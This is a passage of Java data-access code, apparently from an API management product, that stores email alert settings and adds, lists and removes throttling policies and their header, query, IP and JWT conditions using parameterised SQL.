* @throws APIManagementException */ public List<Integer> getSavedAlertTypesIdsByUserNameAndStakeHolder(String userName, String stakeHolder) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<Integer> list = new ArrayList<Integer>(); try { String sqlQuery; conn = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_SAVED_ALERT_TYPES_BY_USERNAME; ps = conn.prepareStatement(sqlQuery); ps.setString(1, userName); ps.setString(2, stakeHolder); resultSet = ps.executeQuery(); while (resultSet.next()) { list.add(resultSet.getInt(1)); } } catch (SQLException e) { handleException("Failed to retrieve saved alert types by user name. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return list; } /** * This method will retrieve saved emails list by user name and stakeholder. * * @param userName user name. * @param stakeHolder "publisher" , "subscriber" or "admin-dashboard" * @return * @throws APIManagementException */ public List<String> retrieveSavedEmailList(String userName, String stakeHolder) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<String> list = new ArrayList<String>(); try { String sqlQuery; conn = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_SAVED_ALERT_EMAILS; ps = conn.prepareStatement(sqlQuery); ps.setString(1, userName); ps.setString(2, stakeHolder); resultSet = ps.executeQuery(); while (resultSet.next()) { list.add(resultSet.getString(1)); } } catch (SQLException e) { handleException("Failed to retrieve saved alert types by user name. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return list; } /** * This method will delete all email alert subscriptions details from tables * * @param userName * @param agent whether its publisher or store or admin dash board. */ public void unSubscribeAlerts(String userName, String agent) throws APIManagementException, SQLException { Connection connection; PreparedStatement ps = null; ResultSet rs = null; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); try { connection.setAutoCommit(false); String alertTypesQuery = SQLConstants.ADD_ALERT_TYPES_VALUES; String deleteAlertTypesByUserNameAndStakeHolderQuery = SQLConstants.DELETE_ALERTTYPES_BY_USERNAME_AND_STAKE_HOLDER; ps = connection.prepareStatement(deleteAlertTypesByUserNameAndStakeHolderQuery); ps.setString(1, userName); ps.setString(2, agent); ps.executeUpdate(); String getEmailListIdByUserNameAndStakeHolderQuery = SQLConstants.GET_EMAILLISTID_BY_USERNAME_AND_STAKEHOLDER; ps = connection.prepareStatement(getEmailListIdByUserNameAndStakeHolderQuery); ps.setString(1, userName); ps.setString(2, agent); rs = ps.executeQuery(); int emailListId = 0; while (rs.next()) { emailListId = rs.getInt(1); } if (emailListId != 0) { String deleteEmailListDetailsByEmailListId = SQLConstants.DELETE_EMAILLIST_BY_EMAIL_LIST_ID; ps = connection.prepareStatement(deleteEmailListDetailsByEmailListId); ps.setInt(1, emailListId); ps.executeUpdate(); } connection.commit(); } catch (SQLException e) { handleException("Failed to delete alert email data.", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, rs); } } /** * @param userName User name. * @param emailList Comma separated email list. * @param alertTypesIDList Comma separated alert types list. * @param stakeHolder if pram value = p we assume those changes from publisher if param value = s those data belongs to * subscriber. 
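     * <p>
     * Illustrative call with hypothetical values, assuming {@code dao} is an instance of this class:
     * <pre>
     * dao.addAlertTypesConfigInfo("[email protected]", "[email protected],[email protected]", "1,2,3", "p");
     * </pre>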
* @throws APIManagementException * @throws SQLException */ public void addAlertTypesConfigInfo(String userName, String emailList, String alertTypesIDList, String stakeHolder) throws APIManagementException, SQLException { Connection connection; PreparedStatement ps = null; ResultSet rs = null; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); try { String alertTypesQuery = SQLConstants.ADD_ALERT_TYPES_VALUES; String deleteAlertTypesByUserNameAndStakeHolderQuery = SQLConstants.DELETE_ALERTTYPES_BY_USERNAME_AND_STAKE_HOLDER; ps = connection.prepareStatement(deleteAlertTypesByUserNameAndStakeHolderQuery); ps.setString(1, userName); ps.setString(2, stakeHolder); ps.executeUpdate(); if (!StringUtils.isEmpty(alertTypesIDList)) { List<String> alertTypeIdList = Arrays.asList(alertTypesIDList.split(",")); for (String alertTypeId : alertTypeIdList) { PreparedStatement psAlertTypeId = null; try { psAlertTypeId = connection.prepareStatement(alertTypesQuery); psAlertTypeId.setInt(1, Integer.parseInt(alertTypeId)); psAlertTypeId.setString(2, userName); psAlertTypeId.setString(3, stakeHolder); psAlertTypeId.execute(); } catch (SQLException e) { handleException("Error while adding alert types", e); } finally { APIMgtDBUtil.closeAllConnections(psAlertTypeId, null, null); } } } String getEmailListIdByUserNameAndStakeHolderQuery = SQLConstants.GET_EMAILLISTID_BY_USERNAME_AND_STAKEHOLDER; ps = connection.prepareStatement(getEmailListIdByUserNameAndStakeHolderQuery); ps.setString(1, userName); ps.setString(2, stakeHolder); rs = ps.executeQuery(); int emailListId = 0; while (rs.next()) { emailListId = rs.getInt(1); } if (emailListId != 0) { String deleteEmailListDetailsByEmailListId = SQLConstants.DELETE_EMAILLIST_BY_EMAIL_LIST_ID; ps = connection.prepareStatement(deleteEmailListDetailsByEmailListId); ps.setInt(1, emailListId); ps.executeUpdate(); if (!StringUtils.isEmpty(emailList)) { List<String> extractedEmailList = Arrays.asList(emailList.split(",")); String saveEmailListDetailsQuery = SQLConstants.SAVE_EMAIL_LIST_DETAILS_QUERY; for (String email : extractedEmailList) { PreparedStatement extractedEmailListPs = null; try { extractedEmailListPs = connection.prepareStatement(saveEmailListDetailsQuery); extractedEmailListPs.setInt(1, emailListId); extractedEmailListPs.setString(2, email); extractedEmailListPs.execute(); } catch (SQLException e) { handleException("Error while save email list.", e); } finally { APIMgtDBUtil.closeAllConnections(extractedEmailListPs, null, null); } } } } else { String emailListSaveQuery = SQLConstants.ADD_ALERT_EMAIL_LIST; String dbProductName = connection.getMetaData().getDatabaseProductName(); ps = connection.prepareStatement(emailListSaveQuery, new String[]{DBUtils. 
getConvertedAutoGeneratedColumnName(dbProductName, "EMAIL_LIST_ID")}); ps.setString(1, userName); ps.setString(2, stakeHolder); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { int generatedEmailIdList = rs.getInt(1); if (!StringUtils.isEmpty(emailList)) { List<String> extractedEmailList = Arrays.asList(emailList.split(",")); String saveEmailListDetailsQuery = SQLConstants.SAVE_EMAIL_LIST_DETAILS_QUERY; for (String email : extractedEmailList) { PreparedStatement elseExtractedEmailListPS = null; try { elseExtractedEmailListPS = connection.prepareStatement(saveEmailListDetailsQuery); elseExtractedEmailListPS.setInt(1, generatedEmailIdList); elseExtractedEmailListPS.setString(2, email); elseExtractedEmailListPS.execute(); } catch (SQLException e) { handleException("Error while save email list.", e); } finally { APIMgtDBUtil.closeAllConnections(elseExtractedEmailListPS, null, null); } } } } } connection.commit(); } catch (SQLException e) { handleException("Failed to save alert preferences", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, rs); } } /** * Add a Application level throttling policy to database * * @param policy policy object defining the throttle policy * @throws APIManagementException */ public void addApplicationPolicy(ApplicationPolicy policy) throws APIManagementException { Connection conn = null; PreparedStatement policyStatement = null; boolean hasCustomAttrib = false; try { if (policy.getCustomAttributes() != null) { hasCustomAttrib = true; } conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String addQuery = SQLConstants.INSERT_APPLICATION_POLICY_SQL; if (hasCustomAttrib) { addQuery = SQLConstants.INSERT_APPLICATION_POLICY_WITH_CUSTOM_ATTRIB_SQL; } policyStatement = conn.prepareStatement(addQuery); setCommonParametersForPolicy(policyStatement, policy); if (hasCustomAttrib) { policyStatement.setBlob(12, new ByteArrayInputStream(policy.getCustomAttributes())); } policyStatement.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException ex) { // Rollback failed. 
Exception will be thrown later for upper exception log.error("Failed to rollback the add Application Policy: " + policy.toString(), ex); } } handleException("Failed to add Application Policy: " + policy, e); } finally { APIMgtDBUtil.closeAllConnections(policyStatement, conn, null); } } /** * Add a Subscription level throttling policy to database * * @param policy policy object defining the throttle policy * @throws APIManagementException */ public void addSubscriptionPolicy(SubscriptionPolicy policy) throws APIManagementException { Connection conn = null; PreparedStatement policyStatement = null; boolean hasCustomAttrib = false; try { if (policy.getCustomAttributes() != null) { hasCustomAttrib = true; } conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String addQuery = SQLConstants.INSERT_SUBSCRIPTION_POLICY_SQL; if (hasCustomAttrib) { addQuery = SQLConstants.INSERT_SUBSCRIPTION_POLICY_WITH_CUSTOM_ATTRIB_SQL; } policyStatement = conn.prepareStatement(addQuery); setCommonParametersForPolicy(policyStatement, policy); policyStatement.setInt(12, policy.getRateLimitCount()); policyStatement.setString(13, policy.getRateLimitTimeUnit()); policyStatement.setBoolean(14, policy.isStopOnQuotaReach()); policyStatement.setString(15, policy.getBillingPlan()); if (hasCustomAttrib) { policyStatement.setBytes(16, policy.getCustomAttributes()); } policyStatement.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the add Subscription Policy: " + policy.toString(), ex); } } handleException("Failed to add Subscription Policy: " + policy, e); } finally { APIMgtDBUtil.closeAllConnections(policyStatement, conn, null); } } /** * Wrapper method for {@link #addAPIPolicy(APIPolicy, Connection)} to add * API Policy without managing the database connection manually. * * @param policy policy object to add * @throws APIManagementException */ public APIPolicy addAPIPolicy(APIPolicy policy) throws APIManagementException { Connection connection = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); addAPIPolicy(policy, connection); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the add Api Policy: " + policy.toString(), ex); } } handleException("Failed to add Api Policy: " + policy, e); } finally { APIMgtDBUtil.closeAllConnections(null, connection, null); } return policy; } /** * Add a API level throttling policy to database. * <p> * If valid policy Id (not -1) is present in the <code>policy</code> object, * policy will be inserted with that policy Id. * Otherwise policy Id will be auto incremented. 
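     * Note: some databases (H2, for example) do not return generated keys when the key is supplied
     * explicitly; in that case the policy id carried in the {@code policy} object is used as-is
     * (see the in-line comment in the method body).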
* </p> * * @param policy policy object defining the throttle policy * @throws SQLException */ private void addAPIPolicy(APIPolicy policy, Connection conn) throws SQLException { ResultSet resultSet = null; PreparedStatement policyStatement = null; String addQuery = SQLConstants.ThrottleSQLConstants.INSERT_API_POLICY_SQL; int policyId; try { String dbProductName = conn.getMetaData().getDatabaseProductName(); policyStatement = conn.prepareStatement(addQuery, new String[]{DBUtils.getConvertedAutoGeneratedColumnName(dbProductName, "POLICY_ID")}); setCommonParametersForPolicy(policyStatement, policy); policyStatement.setString(12, policy.getUserLevel()); policyStatement.executeUpdate(); resultSet = policyStatement.getGeneratedKeys(); // Get the inserted POLICY_ID (auto incremented value) // Returns only single row if (resultSet.next()) { /* * H2 doesn't return generated keys when key is provided (not generated). Therefore policyId should be policy parameter's policyId when it is provided. */ policyId = resultSet.getInt(1); List<Pipeline> pipelines = policy.getPipelines(); if (pipelines != null) { for (Pipeline pipeline : pipelines) { // add each pipeline data to AM_CONDITION_GROUP table addPipeline(pipeline, policyId, conn); } } } } finally { APIMgtDBUtil.closeAllConnections(policyStatement, null, resultSet); } } /** * Update a API level throttling policy to database. * <p> * policy will be inserted with that policy Id. * </p> * * @param policy policy object defining the throttle policy * @throws SQLException */ private void updateAPIPolicy(APIPolicy policy, Connection conn) throws SQLException { ResultSet resultSet = null; PreparedStatement policyStatement = null; String addQuery = SQLConstants.ThrottleSQLConstants.INSERT_API_POLICY_WITH_ID_SQL; int policyId = policy.getPolicyId(); try { Statement st = conn.createStatement(); String driverName = conn.getMetaData().getDriverName(); if (driverName.contains("MS SQL") || driverName.contains("Microsoft")) { st.executeUpdate("SET IDENTITY_INSERT AM_API_THROTTLE_POLICY ON"); } String dbProductName = conn.getMetaData().getDatabaseProductName(); policyStatement = conn.prepareStatement(addQuery, new String[]{DBUtils.getConvertedAutoGeneratedColumnName(dbProductName, "POLICY_ID")}); setCommonParametersForPolicy(policyStatement, policy); policyStatement.setString(12, policy.getUserLevel()); policyStatement.setBoolean(10, true); policyStatement.setInt(13, policyId); int updatedRawCount = policyStatement.executeUpdate(); if (driverName.contains("MS SQL") || driverName.contains("Microsoft")) { st.executeUpdate("SET IDENTITY_INSERT AM_API_THROTTLE_POLICY OFF"); } // Returns only single row if (updatedRawCount > 0) { List<Pipeline> pipelines = policy.getPipelines(); if (pipelines != null) { for (Pipeline pipeline : pipelines) { // add each pipeline data to AM_CONDITION_GROUP table addPipeline(pipeline, policyId, conn); } } } } finally { APIMgtDBUtil.closeAllConnections(policyStatement, null, resultSet); } } /** * Add throttling policy pipeline to database * * @param pipeline condition pipeline * @param policyID id of the policy to add pipeline * @param conn database connection. 
This should be provided inorder to rollback transaction * @throws SQLException */ private void addPipeline(Pipeline pipeline, int policyID, Connection conn) throws SQLException { PreparedStatement conditionStatement = null; ResultSet rs = null; try { String sqlAddQuery = SQLConstants.ThrottleSQLConstants.INSERT_CONDITION_GROUP_SQL; List<Condition> conditionList = pipeline.getConditions(); // Add data to the AM_CONDITION table String dbProductName = conn.getMetaData().getDatabaseProductName(); conditionStatement = conn.prepareStatement(sqlAddQuery, new String[]{DBUtils .getConvertedAutoGeneratedColumnName(dbProductName, "CONDITION_GROUP_ID")}); conditionStatement. setInt(1, policyID); conditionStatement.setString(2, pipeline.getQuotaPolicy().getType()); if (PolicyConstants.REQUEST_COUNT_TYPE.equals(pipeline.getQuotaPolicy().getType())) { conditionStatement.setLong(3, ((RequestCountLimit) pipeline.getQuotaPolicy().getLimit()).getRequestCount()); conditionStatement.setString(4, null); } else if (PolicyConstants.BANDWIDTH_TYPE.equals(pipeline.getQuotaPolicy().getType())) { BandwidthLimit limit = (BandwidthLimit) pipeline.getQuotaPolicy().getLimit(); conditionStatement.setLong(3, limit.getDataAmount()); conditionStatement.setString(4, limit.getDataUnit()); } conditionStatement.setLong(5, pipeline.getQuotaPolicy().getLimit().getUnitTime()); conditionStatement.setString(6, pipeline.getQuotaPolicy().getLimit().getTimeUnit()); conditionStatement.setString(7, pipeline.getDescription()); conditionStatement.executeUpdate(); rs = conditionStatement.getGeneratedKeys(); // Add Throttling parameters which have multiple entries if (rs != null && rs.next()) { int pipelineId = rs.getInt(1); // Get the inserted // CONDITION_GROUP_ID (auto // incremented value) pipeline.setId(pipelineId); for (Condition condition : conditionList) { if (condition == null) { continue; } String type = condition.getType(); if (PolicyConstants.IP_RANGE_TYPE.equals(type) || PolicyConstants.IP_SPECIFIC_TYPE.equals(type)) { IPCondition ipCondition = (IPCondition) condition; addIPCondition(ipCondition, pipelineId, conn); } if (PolicyConstants.HEADER_TYPE.equals(type)) { addHeaderCondition((HeaderCondition) condition, pipelineId, conn); } else if (PolicyConstants.QUERY_PARAMETER_TYPE.equals(type)) { addQueryParameterCondition((QueryParameterCondition) condition, pipelineId, conn); } else if (PolicyConstants.JWT_CLAIMS_TYPE.equals(type)) { addJWTClaimsCondition((JWTClaimsCondition) condition, pipelineId, conn); } } } } finally { APIMgtDBUtil.closeAllConnections(conditionStatement, null, rs); } } /** * Add HEADER throttling condition to AM_HEADER_FIELD_CONDITION table * * @param headerCondition {@link HeaderCondition} with header fieled and value * @param pipelineId id of the pipeline which this condition belongs to * @param conn database connection. 
This should be provided inorder to rollback transaction * @throws SQLException */ private void addHeaderCondition(HeaderCondition headerCondition, int pipelineId, Connection conn) throws SQLException { PreparedStatement psHeaderCondition = null; try { String sqlQuery = SQLConstants.ThrottleSQLConstants.INSERT_HEADER_FIELD_CONDITION_SQL; psHeaderCondition = conn.prepareStatement(sqlQuery); psHeaderCondition.setInt(1, pipelineId); psHeaderCondition.setString(2, headerCondition.getHeaderName()); psHeaderCondition.setString(3, headerCondition.getValue()); psHeaderCondition.setBoolean(4, headerCondition.isInvertCondition()); psHeaderCondition.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(psHeaderCondition, null, null); } } /** * Add QUERY throttling condition to AM_QUERY_PARAMETER_CONDITION table * * @param queryParameterCondition {@link QueryParameterCondition} with parameter name and value * @param pipelineId id of the pipeline which this condition belongs to * @param conn database connection. This should be provided inorder to rollback transaction * @throws SQLException */ private void addQueryParameterCondition(QueryParameterCondition queryParameterCondition, int pipelineId, Connection conn) throws SQLException { PreparedStatement psQueryParameterCondition = null; try { String sqlQuery = SQLConstants.ThrottleSQLConstants.INSERT_QUERY_PARAMETER_CONDITION_SQL; psQueryParameterCondition = conn.prepareStatement(sqlQuery); psQueryParameterCondition.setInt(1, pipelineId); psQueryParameterCondition.setString(2, queryParameterCondition.getParameter()); psQueryParameterCondition.setString(3, queryParameterCondition.getValue()); psQueryParameterCondition.setBoolean(4, queryParameterCondition.isInvertCondition()); psQueryParameterCondition.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(psQueryParameterCondition, null, null); } } private void addIPCondition(IPCondition ipCondition, int pipelineId, Connection conn) throws SQLException { PreparedStatement statementIPCondition = null; try { String sqlQuery = SQLConstants.ThrottleSQLConstants.INSERT_IP_CONDITION_SQL; statementIPCondition = conn.prepareStatement(sqlQuery); String startingIP = ipCondition.getStartingIP(); String endingIP = ipCondition.getEndingIP(); String specificIP = ipCondition.getSpecificIP(); statementIPCondition.setString(1, startingIP); statementIPCondition.setString(2, endingIP); statementIPCondition.setString(3, specificIP); statementIPCondition.setBoolean(4, ipCondition.isInvertCondition()); statementIPCondition.setInt(5, pipelineId); statementIPCondition.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(statementIPCondition, null, null); } } /** * Add JWTCLAIMS throttling condition to AM_JWT_CLAIM_CONDITION table * * @param jwtClaimsCondition {@link JWTClaimsCondition} with claim url and claim attribute * @param pipelineId id of the pipeline which this condition belongs to * @param conn database connection. 
This should be provided in order to roll back the transaction * @throws SQLException */ private void addJWTClaimsCondition(JWTClaimsCondition jwtClaimsCondition, int pipelineId, Connection conn) throws SQLException { PreparedStatement psJWTClaimsCondition = null; try { String sqlQuery = SQLConstants.ThrottleSQLConstants.INSERT_JWT_CLAIM_CONDITION_SQL; psJWTClaimsCondition = conn.prepareStatement(sqlQuery); psJWTClaimsCondition.setInt(1, pipelineId); psJWTClaimsCondition.setString(2, jwtClaimsCondition.getClaimUrl()); psJWTClaimsCondition.setString(3, jwtClaimsCondition.getAttribute()); psJWTClaimsCondition.setBoolean(4, jwtClaimsCondition.isInvertCondition()); psJWTClaimsCondition.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(psJWTClaimsCondition, null, null); } } /** * Add a Global level throttling policy to the database * * @param policy Global Policy * @throws APIManagementException */ public void addGlobalPolicy(GlobalPolicy policy) throws APIManagementException { Connection conn = null; PreparedStatement policyStatement = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String addQuery = SQLConstants.INSERT_GLOBAL_POLICY_SQL; policyStatement = conn.prepareStatement(addQuery); policyStatement.setString(1, policy.getPolicyName()); policyStatement.setInt(2, policy.getTenantId()); policyStatement.setString(3, policy.getKeyTemplate()); policyStatement.setString(4, policy.getDescription()); InputStream siddhiQueryInputStream; byte[] byteArray = policy.getSiddhiQuery().getBytes(Charset.defaultCharset()); int lengthOfBytes = byteArray.length; siddhiQueryInputStream = new ByteArrayInputStream(byteArray); policyStatement.setBinaryStream(5, siddhiQueryInputStream, lengthOfBytes); policyStatement.setBoolean(6, false); policyStatement.setString(7, UUID.randomUUID().toString()); policyStatement.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException ex) { // rollback failed.
exception will be thrown later for upper exception log.error("Failed to rollback the add Global Policy: " + policy.toString(), ex); } } handleException("Failed to add Global Policy: " + policy, e); } finally { APIMgtDBUtil.closeAllConnections(policyStatement, conn, null); } } /** * Retrieves global policy key templates for the given tenantID * * @param tenantID tenant id * @return list of KeyTemplates * @throws APIManagementException */ public List<String> getGlobalPolicyKeyTemplates(int tenantID) throws APIManagementException { List<String> keyTemplates = new ArrayList<String>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = null; try { conn = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_GLOBAL_POLICY_KEY_TEMPLATES; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { keyTemplates.add(rs.getString(ThrottlePolicyConstants.COLUMN_KEY_TEMPLATE)); } } catch (SQLException e) { handleException("Error while executing SQL to get GLOBAL_POLICY_KEY_TEMPLATES", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return keyTemplates; } /** * Returns true if the key template exist in DB * * @param policy Global Policy * @return true if key template already exists * @throws APIManagementException */ public boolean isKeyTemplatesExist(GlobalPolicy policy) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = null; try { conn = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_GLOBAL_POLICY_KEY_TEMPLATE; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, policy.getTenantId()); ps.setString(2, policy.getKeyTemplate()); ps.setString(3, policy.getPolicyName()); rs = ps.executeQuery(); if (rs.next()) { return true; } } catch (SQLException e) { handleException("Error while executing SQL to get GLOBAL_POLICY_KEY_TEMPLATE", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return false; } /** * Removes a throttling policy from the database * * @param policyLevel level of the policy to be deleted * @param policyName name of the policy * @param tenantId used to get the tenant id * @throws APIManagementException */ public void removeThrottlePolicy(String policyLevel, String policyName, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement deleteStatement = null; String query = null; if (PolicyConstants.POLICY_LEVEL_APP.equals(policyLevel)) { query = SQLConstants.DELETE_APPLICATION_POLICY_SQL; } else if (PolicyConstants.POLICY_LEVEL_SUB.equals(policyLevel)) { query = SQLConstants.DELETE_SUBSCRIPTION_POLICY_SQL; } else if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { query = SQLConstants.ThrottleSQLConstants.DELETE_API_POLICY_SQL; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equals(policyLevel)) { query = SQLConstants.DELETE_GLOBAL_POLICY_SQL; } try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); deleteStatement = connection.prepareStatement(query); deleteStatement.setInt(1, tenantId); deleteStatement.setString(2, policyName); deleteStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Failed to remove policy " + policyLevel + '-' + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(deleteStatement, connection, null); } } /** * Get API level policies. Result only contains basic details of the policy, * it doesn't contain pipeline information. 
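     * <p>Illustrative usage (not part of the original source; {@code apiMgtDAO} is an instance of this class
     * and {@code tenantId} is the tenant to query):</p>
     * <pre>{@code
     * APIPolicy[] apiPolicies = apiMgtDAO.getAPIPolicies(tenantId);
     * }</pre>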
* * @param tenantID policies are selected using tenantID * @return APIPolicy ArrayList * @throws APIManagementException */ public APIPolicy[] getAPIPolicies(int tenantID) throws APIManagementException { List<APIPolicy> policies = new ArrayList<APIPolicy>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICIES; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICIES; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { APIPolicy apiPolicy = new APIPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(apiPolicy, rs); apiPolicy.setUserLevel(rs.getString(ThrottlePolicyConstants.COLUMN_APPLICABLE_LEVEL)); policies.add(apiPolicy); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return policies.toArray(new APIPolicy[policies.size()]); } /** * Get application level polices * * @param tenantID polices are selected only belong to specific tenantID * @return AppilicationPolicy array list */ public ApplicationPolicy[] getApplicationPolicies(int tenantID) throws APIManagementException { List<ApplicationPolicy> policies = new ArrayList<ApplicationPolicy>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_APP_POLICIES; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APP_POLICIES; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { ApplicationPolicy appPolicy = new ApplicationPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(appPolicy, rs); policies.add(appPolicy); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return policies.toArray(new ApplicationPolicy[policies.size()]); } /** * Get all subscription level policeis belongs to specific tenant * * @param tenantID tenantID filters the polices belongs to specific tenant * @return subscriptionPolicy array list */ public SubscriptionPolicy[] getSubscriptionPolicies(int tenantID) throws APIManagementException { List<SubscriptionPolicy> policies = new ArrayList<SubscriptionPolicy>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICIES; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICIES; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { SubscriptionPolicy subPolicy = new SubscriptionPolicy( rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(subPolicy, rs); subPolicy.setRateLimitCount(rs.getInt(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_COUNT)); subPolicy.setRateLimitTimeUnit(rs.getString(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_TIME_UNIT)); subPolicy.setStopOnQuotaReach(rs.getBoolean(ThrottlePolicyConstants.COLUMN_STOP_ON_QUOTA_REACH)); subPolicy.setBillingPlan(rs.getString(ThrottlePolicyConstants.COLUMN_BILLING_PLAN)); InputStream binary = rs.getBinaryStream(ThrottlePolicyConstants.COLUMN_CUSTOM_ATTRIB); if (binary != null) { byte[] customAttrib = APIUtil.toByteArray(binary); 
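                        // Custom attributes are stored in a binary column; copy the bytes onto the policy object.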
subPolicy.setCustomAttributes(customAttrib); } policies.add(subPolicy); } } catch (SQLException e) { handleException("Error while executing SQL", e); } catch (IOException e) { handleException("Error while converting input stream to byte array", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return policies.toArray(new SubscriptionPolicy[policies.size()]); } /** * Get all Global level policies belonging to a specific tenant * * @param tenantID tenant id used to filter the policies * @return GlobalPolicy array * @throws APIManagementException */ public GlobalPolicy[] getGlobalPolicies(int tenantID) throws APIManagementException { List<GlobalPolicy> policies = new ArrayList<GlobalPolicy>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_GLOBAL_POLICIES; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_GLOBAL_POLICIES; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { String siddhiQuery = null; GlobalPolicy globalPolicy = new GlobalPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); globalPolicy.setDescription(rs.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION)); globalPolicy.setPolicyId(rs.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID)); globalPolicy.setUUID(rs.getString(ThrottlePolicyConstants.COLUMN_UUID)); globalPolicy.setTenantId(rs.getInt(ThrottlePolicyConstants.COLUMN_TENANT_ID)); globalPolicy.setKeyTemplate(rs.getString(ThrottlePolicyConstants.COLUMN_KEY_TEMPLATE)); globalPolicy.setDeployed(rs.getBoolean(ThrottlePolicyConstants.COLUMN_DEPLOYED)); InputStream siddhiQueryBlob = rs.getBinaryStream(ThrottlePolicyConstants.COLUMN_SIDDHI_QUERY); if (siddhiQueryBlob != null) { siddhiQuery = APIMgtDBUtil.getStringFromInputStream(siddhiQueryBlob); } globalPolicy.setSiddhiQuery(siddhiQuery); policies.add(globalPolicy); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return policies.toArray(new GlobalPolicy[policies.size()]); } /** * Get a particular Global level policy.
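     * <p>Illustrative usage (not part of the original source; {@code apiMgtDAO} is an instance of this class):</p>
     * <pre>{@code
     * GlobalPolicy globalPolicy = apiMgtDAO.getGlobalPolicy("myGlobalPolicy");
     * }</pre>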
